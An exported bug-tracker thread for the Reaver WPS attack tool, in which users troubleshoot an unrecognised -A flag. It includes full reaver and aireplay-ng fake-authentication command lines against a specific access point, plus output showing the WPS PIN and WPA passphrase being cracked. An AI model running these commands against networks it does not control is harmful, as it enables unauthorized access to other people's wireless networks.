backwardhero / reaver-wps

Automatically exported from code.google.com/p/reaver-wps
0 stars 0 forks source link

-A option doesn´twork #139

Closed GoogleCodeExporter closed 8 years ago

GoogleCodeExporter commented 8 years ago
0. What version of Reaver are you using?  

Reaver 1.3 r90

1. What operating system are you using (Linux is the only supported OS)?

BT4 R2 rt2800usb

2. Is your wireless card in monitor mode (yes/no)?

yes 

3. What is the signal strength of the Access Point you are trying to crack?

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH 

88:25:2C:52:67:63   19       2        0    0   6  54e. WPA2 CCMP   PSK  test

4. What is the manufacturer and model # of the device you are trying to
crack?

Arcadyan Speedport W 722V

5. What is the entire command line string you are supplying to reaver?

reaver -i mon0 -b 88:25:2C:52:67:63 -c 6 -e test -w -d 2 -vv -A

6. Please describe what you think the issue is.

The -A option doesn´t work or maybe I did type the wrong syntax.

Because of this problem below I wanna try the -A option

root@bt:~# reaver -i mon0 -b 88:25:2C:52:67:63 -c 6 -e test -w -d 2 -vv

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner 
<cheffner@tacnetsol.com>

[?] Restore previous session? [n/Y] n
[+] Waiting for beacon from 88:25:2C:52:67:63
[+] Switching mon0 to channel 6
[+] Associated with 88:25:2C:52:67:63 (ESSID: test)
[+] Trying pin 32911176
[+] Trying pin 29691173
[!] WARNING: Failed to associate with 88:25:2C:52:67:63 (ESSID: test)

Then I did start the association with aireplay-ng

root@bt:~# aireplay-ng --fakeauth 600 -e test -a 88:25:2C:52:67:63 -h 
00:c0:ca:36:72:a3 mon0
13:54:50  Waiting for beacon frame (BSSID: 88:25:2C:52:67:63) on channel 6

13:54:50  Sending Authentication Request (Open System) [ACK]
13:54:50  Authentication successful
13:54:50  Sending Association Request [ACK]
13:54:50  Association successful :-) (AID: 1)

13:55:05  Sending keep-alive packet [ACK]
13:55:20  Sending keep-alive packet [ACK]
13:55:35  Sending keep-alive packet [ACK]
13:55:50  Sending keep-alive packet [ACK]
13:56:05  Sending keep-alive packet [ACK]

7. Paste the output from Reaver below.

root@bt:~# reaver -i mon0 -b 88:25:2C:52:67:63 -vv -A

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner 
<cheffner@tacnetsol.com>

reaver: invalid option -- 'A'

Original issue reported on code.google.com by hurenhan...@googlemail.com on 15 Jan 2012 at 7:40

GoogleCodeExporter commented 8 years ago
Try to put it as first argument. The -c has an similiar issue if you put it 
before the ssid i think

Original comment by andremeg...@hotmail.com on 15 Jan 2012 at 9:58

GoogleCodeExporter commented 8 years ago
The -c bug has been fixed. The -A option does exist and works; hurenhannes, 
make sure you are doing a full 'make cleanall && ./configure && make && make 
install' when you check out new SVN updates (the -A option was added several 
revs ago).

Original comment by cheff...@tacnetsol.com on 16 Jan 2012 at 5:00

GoogleCodeExporter commented 8 years ago
-A does indeed work

but at least on the AP I am working with now, after every PIN reaver tests I 
get disassociated

so try setting smaller reassociation interval (instead of 600s something like 
5-30s)

Original comment by jcdento...@gmail.com on 16 Jan 2012 at 10:44

GoogleCodeExporter commented 8 years ago
Make sure you are running the latest SVN code; the -A option was not in reaver 
1.3.

Original comment by cheff...@tacnetsol.com on 16 Jan 2012 at 3:15

GoogleCodeExporter commented 8 years ago
Success!!!  make cleanall FTW

root@bt:~# aireplay-ng mon0 -1 30 -a 88:25:2C:52:67:63 -h 00:c0:ca:36:72:a3
10:57:59  Waiting for beacon frame (BSSID: 88:25:2C:52:67:63) on channel 6

10:57:59  Sending Authentication Request (Open System) [ACK]
10:57:59  Authentication successful
10:57:59  Sending Association Request [ACK]
10:57:59  Association successful :-) (AID: 1)

root@bt:~# reaver -i mon0 -b 88:25:2C:52:67:63 -c 6 -e test -w -d 5 -vv -A  

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner 
<cheffner@tacnetsol.com>

[+] Switching mon0 to channel 6
[+] Waiting for beacon from 88:25:2C:52:67:63
[+] Associated with 88:25:2C:52:67:63 (ESSID: test)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Key cracked in 7 seconds
[+] WPS PIN: '12345670'
[+] WPA PSK: '48514323'
[+] AP SSID: 'test'
[+] Nothing done, nothing to save.

Original comment by hurenhan...@googlemail.com on 16 Jan 2012 at 4:22

GoogleCodeExporter commented 8 years ago
"Reaver v1.4 WiFi Protected Setup Attack Tool" 1.4 version how can i download 
this version?

Original comment by burakozy...@gmail.com on 16 Jan 2012 at 4:29

GoogleCodeExporter commented 8 years ago
[deleted comment]
GoogleCodeExporter commented 8 years ago
[deleted comment]
GoogleCodeExporter commented 8 years ago
take a look issue 140 comment 6

Original comment by patricks...@gmail.com on 16 Jan 2012 at 4:33

GoogleCodeExporter commented 8 years ago
Nice! It's always a good day when your AP uses the pin 12345670. :)

Original comment by cheff...@tacnetsol.com on 16 Jan 2012 at 4:50